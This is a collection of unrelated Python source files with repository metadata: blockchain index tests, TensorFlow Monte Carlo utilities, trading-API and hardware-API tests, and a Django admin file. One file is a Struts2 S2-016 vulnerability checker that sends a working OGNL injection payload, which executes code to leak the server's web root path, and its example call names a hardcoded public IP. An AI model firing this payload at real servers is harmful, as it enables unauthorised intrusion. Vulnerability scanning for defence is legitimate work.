# Check that outputs with the same address will only return one txid
print "Testing for txid uniqueness..."
addressHash = "6349a418fc4578d10a372b54b45c280cc8c4382f".decode("hex")
scriptPubKey = CScript([OP_HASH160, addressHash, OP_EQUAL])
unspent = self.nodes[0].listunspent()
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent[0]["txid"], 16), unspent[0]["vout"]))]
tx.vout = [CTxOut(10, scriptPubKey), CTxOut(11, scriptPubKey)]
tx.rehash()
signed_tx = self.nodes[0].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
sent_txid = self.nodes[0].sendrawtransaction(signed_tx["hex"], True)
self.nodes[0].generate(1)
self.sync_all()
txidsmany = self.nodes[1].getaddresstxids("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(len(txidsmany), 4)
assert_equal(txidsmany[3], sent_txid)
# Check that balances are correct
print "Testing balances..."
balance0 = self.nodes[1].getaddressbalance("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(balance0["balance"], 45 * 100000000 + 21)
# Check that balances are correct after spending
print "Testing balances after spending..."
privkey2 = "cSdkPxkAjA4HDr5VHgsebAPDEh9Gyub4HK8UJr2DFGGqKKy4K5sG"
address2 = "mgY65WSfEmsyYaYPQaXhmXMeBhwp4EcsQW"
addressHash2 = "0b2f0a0c31bfe0406b0ccc1381fdbe311946dadc".decode("hex")
scriptPubKey2 = CScript([OP_DUP, OP_HASH160, addressHash2, OP_EQUALVERIFY, OP_CHECKSIG])
self.nodes[0].importprivkey(privkey2)
unspent = self.nodes[0].listunspent()
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent[0]["txid"], 16), unspent[0]["vout"]))]
amount = unspent[0]["amount"] * 100000000
tx.vout = [CTxOut(amount, scriptPubKey2)]
tx.rehash()
signed_tx = self.nodes[0].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
spending_txid = self.nodes[0].sendrawtransaction(signed_tx["hex"], True)
self.nodes[0].generate(1)
self.sync_all()
balance1 = self.nodes[1].getaddressbalance(address2)
assert_equal(balance1["balance"], amount)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spending_txid, 16), 0))]
send_amount = 1 * 100000000 + 12840
change_amount = amount - send_amount - 10000
tx.vout = [CTxOut(change_amount, scriptPubKey2), CTxOut(send_amount, scriptPubKey)]
tx.rehash()
signed_tx = self.nodes[0].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
sent_txid = self.nodes[0].sendrawtransaction(signed_tx["hex"], True)
self.nodes[0].generate(1)
self.sync_all()
balance2 = self.nodes[1].getaddressbalance(address2)
assert_equal(balance2["balance"], change_amount)
# Check that deltas are returned correctly
deltas = self.nodes[1].getaddressdeltas({"addresses": [address2], "start": 1, "end": 200})
balance3 = 0
for delta in deltas:
balance3 += delta["satoshis"]
assert_equal(balance3, change_amount)
assert_equal(deltas[0]["address"], address2)
assert_equal(deltas[0]["blockindex"], 1)
# Check that entire range will be queried
deltasAll = self.nodes[1].getaddressdeltas({"addresses": [address2]})
assert_equal(len(deltasAll), len(deltas))
# Check that deltas can be returned from range of block heights
deltas = self.nodes[1].getaddressdeltas({"addresses": [address2], "start": 113, "end": 113})
assert_equal(len(deltas), 1)
# Check that unspent outputs can be queried
print "Testing utxos..."
utxos = self.nodes[1].getaddressutxos({"addresses": [address2]})
assert_equal(len(utxos), 1)
assert_equal(utxos[0]["satoshis"], change_amount)
# Check that indexes will be updated with a reorg
print "Testing reorg..."
best_hash = self.nodes[0].getbestblockhash()
self.nodes[0].invalidateblock(best_hash)
self.nodes[1].invalidateblock(best_hash)
self.nodes[2].invalidateblock(best_hash)
self.nodes[3].invalidateblock(best_hash)
self.sync_all()
balance4 = self.nodes[1].getaddressbalance(address2)
assert_equal(balance4, balance1)
utxos2 = self.nodes[1].getaddressutxos({"addresses": [address2]})
assert_equal(len(utxos2), 1)
assert_equal(utxos2[0]["satoshis"], amount)
# Check sorting of utxos
self.nodes[2].generate(150)
txidsort1 = self.nodes[2].sendtoaddress(address2, 50)
self.nodes[2].generate(1)
txidsort2 = self.nodes[2].sendtoaddress(address2, 50)
self.nodes[2].generate(1)
self.sync_all()
utxos3 = self.nodes[1].getaddressutxos({"addresses": [address2]})
assert_equal(len(utxos3), 3)
assert_equal(utxos3[0]["height"], 114)
assert_equal(utxos3[1]["height"], 264)
assert_equal(utxos3[2]["height"], 265)
# Check mempool indexing
print "Testing mempool indexing..."
privKey3 = "cVfUn53hAbRrDEuMexyfgDpZPhF7KqXpS8UZevsyTDaugB7HZ3CD"
address3 = "mw4ynwhS7MmrQ27hr82kgqu7zryNDK26JB"
addressHash3 = "aa9872b5bbcdb511d89e0e11aa27da73fd2c3f50".decode("hex")
scriptPubKey3 = CScript([OP_DUP, OP_HASH160, addressHash3, OP_EQUALVERIFY, OP_CHECKSIG])
address4 = "2N8oFVB2vThAKury4vnLquW2zVjsYjjAkYQ"
scriptPubKey4 = CScript([OP_HASH160, addressHash3, OP_EQUAL])
unspent = self.nodes[2].listunspent()
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent[0]["txid"], 16), unspent[0]["vout"]))]
amount = unspent[0]["amount"] * 100000000
tx.vout = [CTxOut(amount, scriptPubKey3)]
tx.rehash()
signed_tx = self.nodes[2].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
memtxid1 = self.nodes[2].sendrawtransaction(signed_tx["hex"], True)
time.sleep(2)
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(int(unspent[1]["txid"], 16), unspent[1]["vout"]))]
amount = unspent[1]["amount"] * 100000000
tx2.vout = [
CTxOut(amount / 4, scriptPubKey3),
CTxOut(amount / 4, scriptPubKey3),
CTxOut(amount / 4, scriptPubKey4),
CTxOut(amount / 4, scriptPubKey4)
]
tx2.rehash()
signed_tx2 = self.nodes[2].signrawtransaction(binascii.hexlify(tx2.serialize()).decode("utf-8"))
memtxid2 = self.nodes[2].sendrawtransaction(signed_tx2["hex"], True)
time.sleep(2)
mempool = self.nodes[2].getaddressmempool({"addresses": [address3]})
assert_equal(len(mempool), 3)
assert_equal(mempool[0]["txid"], memtxid1)
assert_equal(mempool[0]["address"], address3)
assert_equal(mempool[0]["index"], 0)
assert_equal(mempool[1]["txid"], memtxid2)
assert_equal(mempool[1]["index"], 0)
assert_equal(mempool[2]["txid"], memtxid2)
assert_equal(mempool[2]["index"], 1)
self.nodes[2].generate(1);
self.sync_all();
mempool2 = self.nodes[2].getaddressmempool({"addresses": [address3]})
assert_equal(len(mempool2), 0)
tx = CTransaction()
tx.vin = [
CTxIn(COutPoint(int(memtxid2, 16), 0)),
CTxIn(COutPoint(int(memtxid2, 16), 1))
]
tx.vout = [CTxOut(amount / 2 - 10000, scriptPubKey2)]
tx.rehash()
self.nodes[2].importprivkey(privKey3)
signed_tx3 = self.nodes[2].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
memtxid3 = self.nodes[2].sendrawtransaction(signed_tx3["hex"], True)
time.sleep(2)
mempool3 = self.nodes[2].getaddressmempool({"addresses": [address3]})
assert_equal(len(mempool3), 2)
assert_equal(mempool3[0]["prevtxid"], memtxid2)
assert_equal(mempool3[0]["prevout"], 0)
assert_equal(mempool3[1]["prevtxid"], memtxid2)
assert_equal(mempool3[1]["prevout"], 1)
# sending and receiving to the same address
privkey1 = "cQY2s58LhzUCmEXN8jtAp1Etnijx78YRZ466w4ikX1V4UpTpbsf8"
address1 = "myAUWSHnwsQrhuMWv4Br6QsCnpB41vFwHn"
address1hash = "c192bff751af8efec15135d42bfeedf91a6f3e34".decode("hex")
address1script = CScript([OP_DUP, OP_HASH160, address1hash, OP_EQUALVERIFY, OP_CHECKSIG])
self.nodes[0].sendtoaddress(address1, 10)
self.nodes[0].generate(1)
self.sync_all()
utxos = self.nodes[1].getaddressutxos({"addresses": [address1]})
assert_equal(len(utxos), 1)
tx = CTransaction()
tx.vin = [
CTxIn(COutPoint(int(utxos[0]["txid"], 16), utxos[0]["outputIndex"]))
]
amount = utxos[0]["satoshis"] - 1000
tx.vout = [CTxOut(amount, address1script)]
tx.rehash()
self.nodes[0].importprivkey(privkey1)
signed_tx = self.nodes[0].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
mem_txid = self.nodes[0].sendrawtransaction(signed_tx["hex"], True)
self.sync_all()
mempool_deltas = self.nodes[2].getaddressmempool({"addresses": [address1]})
assert_equal(len(mempool_deltas), 2)
# Include chaininfo in results
print "Testing results with chain info..."
deltas_with_info = self.nodes[1].getaddressdeltas({
"addresses": [address2],
"start": 1,
"end": 200,
"chainInfo": True
})
start_block_hash = self.nodes[1].getblockhash(1);
end_block_hash = self.nodes[1].getblockhash(200);
assert_equal(deltas_with_info["start"]["height"], 1)
assert_equal(deltas_with_info["start"]["hash"], start_block_hash)
assert_equal(deltas_with_info["end"]["height"], 200)
assert_equal(deltas_with_info["end"]["hash"], end_block_hash)
utxos_with_info = self.nodes[1].getaddressutxos({"addresses": [address2], "chainInfo": True})
expected_tip_block_hash = self.nodes[1].getblockhash(267);
assert_equal(utxos_with_info["height"], 267)
assert_equal(utxos_with_info["hash"], expected_tip_block_hash)
print "Passed\n"
if __name__ == '__main__':
AddressIndexTest().main()
| [
"[email protected]"
] | |
735d9569094b48a1a43aa0a6385db04c3775a9d5 | 29b5345df054c92fd7bdc116d5ddd326c024f4e3 | /tensorflow/contrib/bayesflow/python/ops/monte_carlo.py | dbfa3611ba0962322f06e5219c7feb2b6087cd24 | [
"Apache-2.0"
] | permissive | RMORIOKA/tensorflow | 13beebfd9a7a64e32e52933f08fe1387b1147876 | 6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6 | refs/heads/master | 2022-11-01T01:41:42.914151 | 2016-11-18T16:20:41 | 2016-11-18T16:20:41 | 74,143,763 | 0 | 1 | Apache-2.0 | 2022-10-08T00:42:05 | 2016-11-18T15:50:00 | C++ | UTF-8 | Python | false | false | 11,628 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Monte Carlo integration and helpers.
## Background
Monte Carlo integration refers to the practice of estimating an expectation with
a sample mean. For example, given random variable `Z in R^k` with density `p`,
the expectation of function `f` can be approximated like:
```
E_p[f(Z)] = \int f(z) p(z) dz
~ S_n
:= n^{-1} \sum_{i=1}^n f(z_i), z_i iid samples from p.
```
If `E_p[|f(Z)|] < infinity`, then `S_n --> E_p[f(Z)]` by the strong law of large
numbers. If `E_p[f(Z)^2] < infinity`, then `S_n` is asymptotically normal with
variance `Var[f(Z)] / n`.
Practitioners of Bayesian statistics often find themselves wanting to estimate
`E_p[f(Z)]` when the distribution `p` is known only up to a constant. For
example, the joint distribution `p(z, x)` may be known, but the evidence
`p(x) = \int p(z, x) dz` may be intractable. In that case, a parameterized
distribution family `q_lambda(z)` may be chosen, and the optimal `lambda` is the
one minimizing the KL divergence between `q_lambda(z)` and
`p(z | x)`. We only know `p(z, x)`, but that is sufficient to find `lambda`.
## Log-space evaluation and subtracting the maximum.
Care must be taken when the random variable lives in a high dimensional space.
For example, the naive importance sample estimate `E_q[f(Z) p(Z) / q(Z)]`
involves the ratio of two terms `p(Z) / q(Z)`, each of which must have tails
dropping off faster than `O(|z|^{-(k + 1)})` in order to have finite integral.
This ratio would often be zero or infinity up to numerical precision.
For that reason, we write
```
Log E_q[ f(Z) p(Z) / q(Z) ]
= Log E_q[ exp{Log[f(Z)] + Log[p(Z)] - Log[q(Z)] - C} ] + C, where
C := Max[ Log[f(Z)] + Log[p(Z)] - Log[q(Z)] ].
```
The maximum value of the exponentiated term will be 0.0, and the the expectation
can be evaluated in a stable manner.
## Ops
@@expectation
@@expectation_importance_sampler
@@expectation_importance_sampler_logspace
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
__all__ = [
'expectation',
'expectation_importance_sampler',
'expectation_importance_sampler_logspace',
]
def expectation_importance_sampler(f,
log_p,
sampling_dist_q,
z=None,
n=None,
seed=None,
name='expectation_importance_sampler'):
r"""Monte Carlo estimate of `E_p[f(Z)] = E_q[f(Z) p(Z) / q(Z)]`.
With `p(z) := exp{log_p(z)}`, this `Op` returns
```
n^{-1} sum_{i=1}^n [ f(z_i) p(z_i) / q(z_i) ], z_i ~ q,
\approx E_q[ f(Z) p(Z) / q(Z) ]
= E_p[f(Z)]
```
This integral is done in log-space with max-subtraction to better handle the
often extreme values that `f(z) p(z) / q(z)` can take on.
If `f >= 0`, it is up to 2x more efficient to exponentiate the result of
`expectation_importance_sampler_logspace` applied to `Log[f]`.
User supplies either `Output` of samples `z`, or number of samples to draw `n`
Args:
f: Callable mapping samples from `sampling_dist_q` to `Output`s with shape
broadcastable to `q.batch_shape`.
For example, `f` works "just like" `q.log_prob`.
log_p: Callable mapping samples from `sampling_dist_q` to `Output`s with
shape broadcastable to `q.batch_shape`.
For example, `log_p` works "just like" `sampling_dist_q.log_prob`.
sampling_dist_q: The sampling distribution.
`tf.contrib.distributions.Distribution`.
`float64` `dtype` recommended.
`log_p` and `q` should be supported on the same set.
z: `Output` of samples from `q`, produced by `q.sample_n`.
n: Integer `Output`. Number of samples to generate if `z` is not provided.
seed: Python integer to seed the random number generator.
name: A name to give this `Op`.
Returns:
The importance sampling estimate. `Output` with `shape` equal
to batch shape of `q`, and `dtype` = `q.dtype`.
"""
q = sampling_dist_q
with ops.name_scope(name, values=[z, n]):
z = _get_samples(q, z, n, seed)
log_p_z = log_p(z)
q_log_prob_z = q.log_prob(z)
def _importance_sampler_positive_f(log_f_z):
# Same as expectation_importance_sampler_logspace, but using Tensors
# rather than samples and functions. Allows us to sample once.
log_values = log_f_z + log_p_z - q_log_prob_z
return _logspace_mean(log_values)
# With f_plus(z) = max(0, f(z)), f_minus(z) = max(0, -f(z)),
# E_p[f(Z)] = E_p[f_plus(Z)] - E_p[f_minus(Z)]
# = E_p[f_plus(Z) + 1] - E_p[f_minus(Z) + 1]
# Without incurring bias, 1 is added to each to prevent zeros in logspace.
# The logarithm is approximately linear around 1 + epsilon, so this is good
# for small values of 'z' as well.
f_z = f(z)
log_f_plus_z = math_ops.log(nn.relu(f_z) + 1.)
log_f_minus_z = math_ops.log(nn.relu(-1. * f_z) + 1.)
log_f_plus_integral = _importance_sampler_positive_f(log_f_plus_z)
log_f_minus_integral = _importance_sampler_positive_f(log_f_minus_z)
return math_ops.exp(log_f_plus_integral) - math_ops.exp(log_f_minus_integral)
def expectation_importance_sampler_logspace(
log_f,
log_p,
sampling_dist_q,
z=None,
n=None,
seed=None,
name='expectation_importance_sampler_logspace'):
r"""Importance sampling with a positive function, in log-space.
With `p(z) := exp{log_p(z)}`, and `f(z) = exp{log_f(z)}`, this `Op`
returns
```
Log[ n^{-1} sum_{i=1}^n [ f(z_i) p(z_i) / q(z_i) ] ], z_i ~ q,
\approx Log[ E_q[ f(Z) p(Z) / q(Z) ] ]
= Log[E_p[f(Z)]]
```
This integral is done in log-space with max-subtraction to better handle the
often extreme values that `f(z) p(z) / q(z)` can take on.
In contrast to `expectation_importance_sampler`, this `Op` returns values in
log-space.
User supplies either `Output` of samples `z`, or number of samples to draw `n`
Args:
log_f: Callable mapping samples from `sampling_dist_q` to `Output`s with
shape broadcastable to `q.batch_shape`.
For example, `log_f` works "just like" `sampling_dist_q.log_prob`.
log_p: Callable mapping samples from `sampling_dist_q` to `Output`s with
shape broadcastable to `q.batch_shape`.
For example, `log_p` works "just like" `q.log_prob`.
sampling_dist_q: The sampling distribution.
`tf.contrib.distributions.Distribution`.
`float64` `dtype` recommended.
`log_p` and `q` should be supported on the same set.
z: `Output` of samples from `q`, produced by `q.sample_n`.
n: Integer `Output`. Number of samples to generate if `z` is not provided.
seed: Python integer to seed the random number generator.
name: A name to give this `Op`.
Returns:
Logarithm of the importance sampling estimate. `Output` with `shape` equal
to batch shape of `q`, and `dtype` = `q.dtype`.
"""
q = sampling_dist_q
with ops.name_scope(name, values=[z, n]):
z = _get_samples(q, z, n, seed)
log_values = log_f(z) + log_p(z) - q.log_prob(z)
return _logspace_mean(log_values)
def _logspace_mean(log_values):
"""Evaluate `Log[E[values]]` in a stable manner.
Args:
log_values: `Output` holding `Log[values]`.
Returns:
`Output` of same `dtype` as `log_values`, reduced across dim 0.
`Log[Mean[values]]`.
"""
# center = Max[Log[values]], with stop-gradient
# The center hopefully keep the exponentiated term small. It is cancelled
# from the final result, so putting stop gradient on it will not change the
# final result. We put stop gradient on to eliminate unnecessary computation.
center = array_ops.stop_gradient(_sample_max(log_values))
# centered_values = exp{Log[values] - E[Log[values]]}
centered_values = math_ops.exp(log_values - center)
# log_mean_of_values = Log[ E[centered_values] ] + center
# = Log[ E[exp{log_values - E[log_values]}] ] + center
# = Log[E[values]] - E[log_values] + center
# = Log[E[values]]
log_mean_of_values = math_ops.log(_sample_mean(centered_values)) + center
return log_mean_of_values
def expectation(f, p, z=None, n=None, seed=None, name='expectation'):
r"""Monte Carlo estimate of an expectation: `E_p[f(Z)]` with sample mean.
This `Op` returns
```
n^{-1} sum_{i=1}^n f(z_i), where z_i ~ p
\approx E_p[f(Z)]
```
User supplies either `Output` of samples `z`, or number of samples to draw `n`
Args:
f: Callable mapping samples from `p` to `Output`s.
p: `tf.contrib.distributions.Distribution`.
z: `Output` of samples from `p`, produced by `p.sample_n`.
n: Integer `Output`. Number of samples to generate if `z` is not provided.
seed: Python integer to seed the random number generator.
name: A name to give this `Op`.
Returns:
An `Output` with the same `dtype` as `p`.
Example:
```python
N_samples = 10000
distributions = tf.contrib.distributions
dist = distributions.Uniform([0.0, 0.0], [1.0, 2.0])
elementwise_mean = lambda x: x
mean_sum = lambda x: tf.reduce_sum(x, 1)
estimate_elementwise_mean_tf = monte_carlo.expectation(elementwise_mean,
dist,
n=N_samples)
estimate_mean_sum_tf = monte_carlo.expectation(mean_sum,
dist,
n=N_samples)
with tf.Session() as sess:
estimate_elementwise_mean, estimate_mean_sum = (
sess.run([estimate_elementwise_mean_tf, estimate_mean_sum_tf]))
print estimate_elementwise_mean
>>> np.array([ 0.50018013 1.00097895], dtype=np.float32)
print estimate_mean_sum
>>> 1.49571
```
"""
with ops.name_scope(name, values=[n, z]):
z = _get_samples(p, z, n, seed)
return _sample_mean(f(z))
def _sample_mean(values):
"""Mean over sample indices. In this module this is always [0]."""
return math_ops.reduce_mean(values, reduction_indices=[0])
def _sample_max(values):
"""Max over sample indices. In this module this is always [0]."""
return math_ops.reduce_max(values, reduction_indices=[0])
def _get_samples(dist, z, n, seed):
"""Check args and return samples."""
with ops.name_scope('get_samples', values=[z, n]):
if (n is None) == (z is None):
raise ValueError(
'Must specify exactly one of arguments "n" and "z". Found: '
'n = %s, z = %s' % (n, z))
if n is not None:
return dist.sample_n(n=n, seed=seed)
else:
return ops.convert_to_tensor(z, name='z')
| [
"[email protected]"
] | |
f18e2900ad229eb69539225ff1271712780b26b1 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/Quote18/HQ_18_042.py | 4520798521b4e456949b24bbd5c72a4af4a40a7b | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,258 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import time
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from log import *
class HQ_18_042(xtp_test_case):
def subMarketData(self, Api, stk_info, case_name, rs_expect):
print Api.GetApiVersion()
def on_market_data(data, error, last):
self.print_msg(case_name, rs_expect, error)
Api.setSubMarketDataHandle(on_market_data)
Api.SubscribeMarketData(stk_info)
time.sleep(1)
def print_msg(self, case_name, rs_expect, error):
if rs_expect == error:
logger.warning('{0}测试正确!'.format(case_name))
else:
logger.error('{0}测试错误!'.format(case_name))
self.assertEqual(error, rs_expect)
def test_HQ_18_042(self):
pyname = 'HQ_18_042'
client_id = 6
Api = XTPQuoteApi(client_id)
Api.Login()
stk_info = {'ticker': '', 'exchange_id': 1}
self.subMarketData(Api, stk_info, pyname,
{'error_id': 11200003, 'error_msg': 'unknown security'}) # 0
Api.Logout()
if __name__=='__main__':
unittest.main()
| [
"[email protected]"
] | |
c8e514cf6371ba34c6915c2a4fa7d98162c04ef5 | 387ad3775fad21d2d8ffa3c84683d9205b6e697d | /testsuite/trunk/epath/set_ep_loc_012.py | 78a9160027aee4ca102953bb975b8d0cbcdb9901 | [] | no_license | kodiyalashetty/test_iot | 916088ceecffc17d2b6a78d49f7ea0bbd0a6d0b7 | 0ae3c2ea6081778e1005c40a9a3f6d4404a08797 | refs/heads/master | 2020-03-22T11:53:21.204497 | 2018-03-09T01:43:41 | 2018-03-09T01:43:41 | 140,002,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,928 | py | #!/usr/bin/env python
"""
(C) Copyright IBM Corp. 2008
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. This
file and program are licensed under a BSD style license. See
the Copying file included with the OpenHPI distribution for
full licensing terms.
Authors:
Suntrupth S Yadav <[email protected]>
"""
"""oh_set_ep_location: Dull entity path and victim element in the middle.
Only victim element's instance number changed. """
import unittest
from openhpi import *
class TestSequence(unittest.TestCase):
def runTest(self):
y = 77002
z = 3
i = 0
ep=SaHpiEntityPathT()
#SaHpiEntityTypeT
w = SAHPI_ENT_SBC_BLADE
#SaHpiEntityLocationT
x = 56873
for i in range(0,z):
ep.Entry[i].EntityType = w
ep.Entry[i].EntityLocation = y
i=i+1
ep.Entry[z].EntityType = SAHPI_ENT_FAN
ep.Entry[z].EntityLocation = z
for i in range(z+1, SAHPI_MAX_ENTITY_PATH):
ep.Entry[i].EntityType = w
ep.Entry[i].EntityLocation = y
i=i+1
err = oh_set_ep_location(ep, SAHPI_ENT_FAN, x)
self.assertEqual (err!=None,True)
self.assertEqual (ep.Entry[z].EntityLocation != x,False)
self.assertEqual (ep.Entry[z].EntityType != SAHPI_ENT_FAN,False)
for i in range ( 0,z ):
self.assertEqual ((ep.Entry[i].EntityType != w) or
(ep.Entry[i].EntityLocation != y),False)
i=i+1
for i in range ( z+1, SAHPI_MAX_ENTITY_PATH):
self.assertEqual ((ep.Entry[i].EntityType != w) or
(ep.Entry[i].EntityLocation != y),False)
if __name__=='__main__':
unittest.main()
| [
"suntrupth@a44bbd40-eb13-0410-a9b2-f80f2f72fa26"
] | suntrupth@a44bbd40-eb13-0410-a9b2-f80f2f72fa26 |
b257b9fbad4c6e99eb47fc7e4b63508036ae8fe7 | 6257b3d146ecff251aabb4dc78cf66bc69d2ab31 | /component/struts/struts2016.py | 980725069fe7fafe8cd96a756da7fe407fcc2015 | [
"MIT"
] | permissive | bigbigx/PocCollect | 39549107f01d313656b451bafe7657cb8c61f410 | 6b0f438e6e6005bd0adbdf3bcc97a2d808c6f9ea | refs/heads/master | 2021-06-04T15:48:04.790219 | 2021-04-06T11:24:54 | 2021-04-06T11:24:54 | 63,687,713 | 0 | 0 | MIT | 2021-04-06T11:24:55 | 2016-07-19T11:19:43 | Python | UTF-8 | Python | false | false | 2,355 | py | #!/usr/bin/env python
# encoding: utf-8
from t import T
import requests
class P(T):
def __init__(self):
T.__init__(self)
keywords=['struts']
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url=''
target_url = 'http://' + ip + ':' + port
if productname.get('path',''):
target_url = 'http://'+ip+':'+port+productname.get('path','')
else:
from script import linktool
listarray=linktool.getaction(target_url)
if len(listarray)>0:
target_url=listarray[0]
else:
target_url = 'http://'+ip+':'+port+'/login.action'
result = {}
timeout=3
result['result']=False
res=None
payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
print target_url
try:
headers = {"Content-Type":"application/x-www-form-urlencoded"}
r = requests.post(target_url,data=payload,headers=headers,timeout=5)
res_html = r.text
except Exception,e:
print e
return result
finally:
if res is not None:
res.close()
del res
if res_html.find("88888887") <> -1:
info = target_url + "struts016 Vul"
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='struts016 Vul'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=payload
result['VerifyInfo']['result'] =info
return result
return result
if __name__ == '__main__':
print P().verify(ip='116.213.171.228',port='80')
| [
"[email protected]"
] | |
8110ddd0dde5af6e6d8fb80a917983c1ae137518 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /hoxv8zaQJNMWJqnt3_1.py | 111f3aa56f45f561eaf1e5c385c12cc977867642 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py |
def is_heteromecic(n,i = 0):
if n == i * (i + 1):
return True
if n < i * (i +1):
return False
i+=1
return is_heteromecic(n, i)
| [
"[email protected]"
] | |
0a1045f155f346fcd6be4db7820ecffde97a490b | eef285b8c4530a7dc1187e08292bf246e3732915 | /chat_project/chat_backend/chat_backend/user/admin.py | 24c2b5b4d4948b6624de91964a94edf55e80a494 | [] | no_license | wlgud0402/making_projects | 32ba45817e48c3d21b174c823177d96af10d9a20 | 6d86d09c61eb70339423f33d6e42ca0cdff391a6 | refs/heads/master | 2023-03-21T09:45:25.600251 | 2021-03-22T13:02:26 | 2021-03-22T13:02:26 | 338,810,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | from django.contrib import admin
from .models import User
# Register your models here.
# admin.site.register(User)
@admin.register(User)
class UserAdmin(admin.ModelAdmin):
list_display = ('email', 'nickname', 'user_type', 'room_id', 'created_at',)
| [
"[email protected]"
] | |
17ca38843edb8b4672e8f653c45f1cec4881a059 | f7ff0b17e010abb7a2545e6583b8210959861a10 | /jupytext/version.py | aafb0cd4af6aefaa1dcb2cfdbae7b1294f5092d0 | [
"MIT"
] | permissive | IanEdington/jupytext | d0b7f61c69ad003eea5fd77283a1b47f689351d3 | bc1b15935e096c280b6630f45e65c331f04f7d9c | refs/heads/master | 2022-11-06T19:51:17.822602 | 2020-06-23T20:59:08 | 2020-06-25T12:37:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | """Jupytext's version number"""
__version__ = "1.5.1-dev"
| [
"[email protected]"
] | |
5df7bbb123a2779a847aa9762e9a98f01c792d2e | ce55c319f5a78b69fefc63595d433864a2e531b5 | /前端+数据分析/套接字/闭包.py | 3471e3e269632f386dfa8ff19ab2bb59ac4d02c1 | [] | no_license | Suijng/1809_data | a072c875e8746190e3b715e53f1afe3323f4666b | 45f8a57089f5c30ccc1a3cddb03b76dc95355417 | refs/heads/master | 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 | HTML | UTF-8 | Python | false | false | 89 | py | x = 300
def test1():
x = 200
def test2():
global x
print('--1--') | [
"[email protected]"
] | |
a81fb81b960fc04f18e1042929aa6c944cfb1007 | 8acffb8c4ddca5bfef910e58d3faa0e4de83fce8 | /ml-flask/Lib/site-packages/networkx/algorithms/flow/capacityscaling.py | 9a6a5c7270f10e7645babe83c8286a14cb73b66f | [
"MIT"
] | permissive | YaminiHP/SimilitudeApp | 8cbde52caec3c19d5fa73508fc005f38f79b8418 | 005c59894d8788c97be16ec420c0a43aaec99b80 | refs/heads/master | 2023-06-27T00:03:00.404080 | 2021-07-25T17:51:27 | 2021-07-25T17:51:27 | 389,390,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:0ba80a661465f023b9da7444cd18a123358f4112509665b5d25721a9fb176ec0
size 14535
| [
"[email protected]"
] | |
